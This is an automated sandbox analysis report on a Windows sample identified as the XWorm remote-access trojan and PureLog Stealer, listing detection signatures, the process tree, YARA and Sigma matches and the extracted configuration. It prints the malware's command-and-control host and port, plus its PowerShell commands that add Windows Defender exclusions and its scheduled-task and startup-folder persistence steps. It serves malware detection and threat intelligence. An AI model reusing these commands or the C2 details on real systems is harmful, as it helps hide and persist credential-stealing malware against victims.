Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe
Analysis ID:	1475711
MD5:	7fda9f799b84a7ed802f7127869d5e81
SHA1:	55137aa833ee1653f52378599aad376073264499
SHA256:	96c861fca93e9209acb17b95b4253f3c26f483ad7dd9eebe15da3067299ef1ac
Tags:	exe
Infos:

Detection

PureLog Stealer, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected PureLog Stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe" MD5: 7FDA9F799B84A7ED802F7127869D5E81)

powershell.exe (PID: 7824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pNYyTm.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5808 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe (PID: 8096 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe" MD5: 7FDA9F799B84A7ED802F7127869D5E81)

pNYyTm.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\pNYyTm.exe MD5: 7FDA9F799B84A7ED802F7127869D5E81)

schtasks.exe (PID: 4676 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

pNYyTm.exe (PID: 1132 cmdline: "C:\Users\user\AppData\Roaming\pNYyTm.exe" MD5: 7FDA9F799B84A7ED802F7127869D5E81)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["moneymaker-30608.portmap.host"], "Port": "30608", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.1314250556.00000000055F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000000F.00000002.1368873082.000000000341E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1817f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2245b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2ccdf:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1821c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x224f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2cd7c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x18331:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2260d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2ce91:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x17d11:$cnc4: POST / HTTP/1.1 0x21fed:$cnc4: POST / HTTP/1.1 0x2c871:$cnc4: POST / HTTP/1.1
00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000002.1308339600.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x16923:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x20bff:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2b4f3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x169c0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x20c9c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2b590:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x16ad5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x20db1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2b6a5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x164b5:$cnc4: POST / HTTP/1.1 0x20791:$cnc4: POST / HTTP/1.1 0x2b085:$cnc4: POST / HTTP/1.1
00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000013.00000002.1406626322.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x88ab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8948:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8a5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x843d:$cnc4: POST / HTTP/1.1
0000000F.00000002.1368873082.00000000033C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000001.00000002.1308339600.0000000002E81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000E.00000002.3724466160.0000000002731000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 7352	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe PID: 8096	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: pNYyTm.exe PID: 8164	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: pNYyTm.exe PID: 8164	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: pNYyTm.exe PID: 1132	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
19.2.pNYyTm.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
19.2.pNYyTm.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x863d:$cnc4: POST / HTTP/1.1
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.55f0000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.pNYyTm.exe.33e2d7c.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6cab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x683d:$cnc4: POST / HTTP/1.1
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ea2f20.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.pNYyTm.exe.34379b0.3.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
15.2.pNYyTm.exe.34379b0.3.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6cab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x683d:$cnc4: POST / HTTP/1.1
15.2.pNYyTm.exe.33e2d7c.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.pNYyTm.exe.342d6d4.4.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
15.2.pNYyTm.exe.342d6d4.4.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6cab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x683d:$cnc4: POST / HTTP/1.1
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6cab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x683d:$cnc4: POST / HTTP/1.1
15.2.pNYyTm.exe.342d6d4.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
15.2.pNYyTm.exe.342d6d4.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12d87:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1d60b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12e24:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d6a8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12f39:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1d7bd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x863d:$cnc4: POST / HTTP/1.1 0x12919:$cnc4: POST / HTTP/1.1 0x1d19d:$cnc4: POST / HTTP/1.1
15.2.pNYyTm.exe.34379b0.3.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
15.2.pNYyTm.exe.34379b0.3.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1332f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x133cc:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x134e1:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x863d:$cnc4: POST / HTTP/1.1 0x12ec1:$cnc4: POST / HTTP/1.1
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2ef6154.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1339f:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1343c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13551:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x863d:$cnc4: POST / HTTP/1.1 0x12f31:$cnc4: POST / HTTP/1.1
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe.2eebe78.4.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8aab:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x12d87:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1d67b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x8b48:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x12e24:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d718:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x8c5d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x12f39:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1d82d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x863d:$cnc4: POST / HTTP/1.1 0x12919:$cnc4: POST / HTTP/1.1 0x1d20d:$cnc4: POST / HTTP/1.1
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ProcessId: 7824, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessId: 8096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pNYyTm.exe, ParentImage: C:\Users\user\AppData\Roaming\pNYyTm.exe, ParentProcessId: 8164, ParentProcessName: pNYyTm.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp6051.tmp", ProcessId: 4676, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pNYyTm" /XML "C:\Users\user\AppData\Local\Temp\tmp496E.tmp", ProcessId: 7908, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ParentProcessId: 7352, ParentProcessName: SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.1456.22106.exe", ProcessId: 7824, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

